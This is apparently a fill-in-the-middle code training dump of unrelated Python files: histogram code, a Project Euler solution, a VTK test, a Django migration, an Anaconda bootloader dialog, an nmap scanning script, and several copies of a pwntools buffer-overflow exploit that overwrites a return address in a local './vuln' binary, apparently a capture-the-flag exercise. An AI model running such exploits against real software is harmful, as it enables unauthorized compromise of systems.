based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def <|fim_middle|>(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | define_bins |
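To make the bin layout described in the HistogramLogscale docstring concrete, here is a standalone sketch of the define_bins logic with numpy standing in for the older scipy helpers; the data values are illustrative:

import numpy as np

data = np.sort(np.array([-2.5, 0.3, 7.0, 42.0, 980.0]))
sf = 10.0
num_bins = int(np.log(data[-1]) / np.log(sf) + 1)        # log base sf, as sp.logn computed
edges = np.logspace(0, num_bins, num_bins + 1, base=sf)  # 1, 10, ..., sf**num_bins
low, high = list(edges[:-1]), list(edges[1:])
if data[0] < 1.0:   # catch-all bin covering 0 - 1
    low.insert(0, 0.0)
    high.insert(0, 1.0)
if data[0] < 0.0:   # catch-all bin for anything below zero
    low.insert(0, float(data[0]))
    high.insert(0, 0.0)
print(list(zip(low, high)))  # [(-2.5, 0.0), (0.0, 1.0), (1.0, 10.0), (10.0, 100.0), (100.0, 1000.0)]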
<|file_name|>problem_001.py<|end_file_name|><|fim▁begin|>from __future__ import division, print_function #, unicode_literals
"""
Multiples of 3 and 5
<|fim▁hole|>
Find the sum of all the multiples of 3 or 5 below 1000.
"""
import numpy as np
# Setup.
num_max = 1000
basis = [3, 5]
factors = []
for i in range(num_max):
for k in basis:
if not i % k:
factors.append(i)
break
print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))
# Done.<|fim▁end|> | If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23. |
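The brute-force loop above can be cross-checked in closed form with inclusion-exclusion: add the multiples of 3 and of 5 below 1000, then subtract the multiples of 15 that were counted twice.

def sum_multiples_below(k, n=1000):
    m = (n - 1) // k           # count of positive multiples of k below n
    return k * m * (m + 1) // 2

total = sum_multiples_below(3) + sum_multiples_below(5) - sum_multiples_below(15)
print(total)  # 233168, the same answer the script prints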
<|file_name|>problem_001.py<|end_file_name|><|fim▁begin|>
from __future__ import division, print_function #, unicode_literals
"""
Multiples of 3 and 5
If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
"""
import numpy as np
# Setup.
num_max = 1000
basis = [3, 5]
factors = []
for i in range(num_max):
for k in basis:
if not i % k:
<|fim_middle|>
print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))
# Done.
<|fim▁end|> | factors.append(i)
break |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:<|fim▁hole|>break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()<|fim▁end|> | return process([exe.path] + argv, *a, **kw)
gdbscript = ''' |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
<|fim_middle|>
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | '''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
<|fim_middle|>
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
<|fim_middle|>
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | return process([exe.path] + argv, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def <|fim_middle|>(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | start |
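One assumption baked into the exploit templates above is the 76-byte distance from the input buffer to the saved return address. With pwntools that offset is recoverable from a crash, which is presumably how the padding length was chosen; the EIP value below is illustrative:

from pwn import cyclic, cyclic_find

pattern = cyclic(200)           # send this instead of the payload, then let the target crash
# Suppose GDB reports the faulting EIP as 0x61616174 ('taaa' in little-endian):
print(cyclic_find(0x61616174))  # 76, the padding length before the return address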
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def spaceship_building(cans):
total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans))<|fim▁hole|>spaceship_building(13)<|fim▁end|> |
spaceship_building(2)
|
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def spaceship_building(cans):
<|fim_middle|>
spaceship_building(2)
spaceship_building(13)<|fim▁end|> | total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans)) |
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def <|fim_middle|>(cans):
total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans))
spaceship_building(2)
spaceship_building(13)<|fim▁end|> | spaceship_building |
<|file_name|>TestMNITagPoints.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Test label reading from an MNI tag file
#
# The current directory must be writeable.
#
try:
fname = "mni-tagtest.tag"
channel = open(fname, "wb")
channel.close()
# create some random points in a sphere
#
sphere1 = vtk.vtkPointSource()
sphere1.SetNumberOfPoints(13)
xform = vtk.vtkTransform()
xform.RotateWXYZ(20, 1, 0, 0)
xformFilter = vtk.vtkTransformFilter()
xformFilter.SetTransform(xform)
xformFilter.SetInputConnection(sphere1.GetOutputPort())
labels = vtk.vtkStringArray()
labels.InsertNextValue("0")
labels.InsertNextValue("1")
labels.InsertNextValue("2")
labels.InsertNextValue("3")
labels.InsertNextValue("Halifax")
labels.InsertNextValue("Toronto")
labels.InsertNextValue("Vancouver")
labels.InsertNextValue("Larry")
labels.InsertNextValue("Bob")
labels.InsertNextValue("Jackie")
<|fim▁hole|>
weights = vtk.vtkDoubleArray()
weights.InsertNextValue(1.0)
weights.InsertNextValue(1.1)
weights.InsertNextValue(1.2)
weights.InsertNextValue(1.3)
weights.InsertNextValue(1.4)
weights.InsertNextValue(1.5)
weights.InsertNextValue(1.6)
weights.InsertNextValue(1.7)
weights.InsertNextValue(1.8)
weights.InsertNextValue(1.9)
weights.InsertNextValue(0.9)
weights.InsertNextValue(0.8)
weights.InsertNextValue(0.7)
writer = vtk.vtkMNITagPointWriter()
writer.SetFileName(fname)
writer.SetInputConnection(sphere1.GetOutputPort())
writer.SetInputConnection(1, xformFilter.GetOutputPort())
writer.SetLabelText(labels)
writer.SetWeights(weights)
writer.SetComments("Volume 1: sphere points\nVolume 2: transformed points")
writer.Write()
reader = vtk.vtkMNITagPointReader()
reader.CanReadFile(fname)
reader.SetFileName(fname)
textProp = vtk.vtkTextProperty()
textProp.SetFontSize(12)
textProp.SetColor(1.0, 1.0, 0.5)
labelHier = vtk.vtkPointSetToLabelHierarchy()
labelHier.SetInputConnection(reader.GetOutputPort())
labelHier.SetTextProperty(textProp)
labelHier.SetLabelArrayName("LabelText")
labelHier.SetMaximumDepth(15)
labelHier.SetTargetLabelCount(12)
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(labelHier.GetOutputPort())
labelMapper.UseDepthBufferOff()
labelMapper.SetShapeToRect()
labelMapper.SetStyleToOutline()
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
glyphSource = vtk.vtkSphereSource()
glyphSource.SetRadius(0.01)
glyph = vtk.vtkGlyph3D()
glyph.SetSourceConnection(glyphSource.GetOutputPort())
glyph.SetInputConnection(reader.GetOutputPort())
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(glyph.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# Create rendering stuff
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddViewProp(actor)
ren1.AddViewProp(labelActor)
ren1.SetBackground(0, 0, 0)
renWin.SetSize(300, 300)
renWin.Render()
try:
os.remove(fname)
except OSError:
pass
# render the image
#
# iren.Start()
except IOError:
print "Unable to test the writer/reader."<|fim▁end|> | labels.InsertNextValue("10")
labels.InsertNextValue("11")
labels.InsertNextValue("12")
|
<|file_name|>0050_auto_20181005_1425.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("elections", "0049_move_status")]
operations = [
migrations.RemoveField(model_name="election", name="rejection_reason"),
migrations.RemoveField(model_name="election", name="suggested_status"),<|fim▁hole|> migrations.RemoveField(model_name="election", name="suggestion_reason"),
]<|fim▁end|> | |
<|file_name|>0050_auto_20181005_1425.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
<|fim_middle|>
<|fim▁end|> | dependencies = [("elections", "0049_move_status")]
operations = [
migrations.RemoveField(model_name="election", name="rejection_reason"),
migrations.RemoveField(model_name="election", name="suggested_status"),
migrations.RemoveField(model_name="election", name="suggestion_reason"),
] |
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the <|fim▁hole|>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if scanner[host].hostname() == "":
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())<|fim▁end|> | name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
|
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
<|fim_middle|>
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if scanner[host].hostname() == "":
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
<|fim▁end|> | sys.exit("Please provide two arguments the first being the targets the second the ports") |
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if scanner[host].hostname() == "":
prin <|fim_middle|>
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
<|fim▁end|> | t("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
|
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if scanner[host].hostname() == "":
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
prin <|fim_middle|>
<|fim▁end|> | t("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
|
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License<|fim▁hole|># Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox<|fim▁end|> | # along with this program; if not, write to the Free Software |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
<|fim_middle|>
<|fim▁end|> | windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
<|fim_middle|>
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
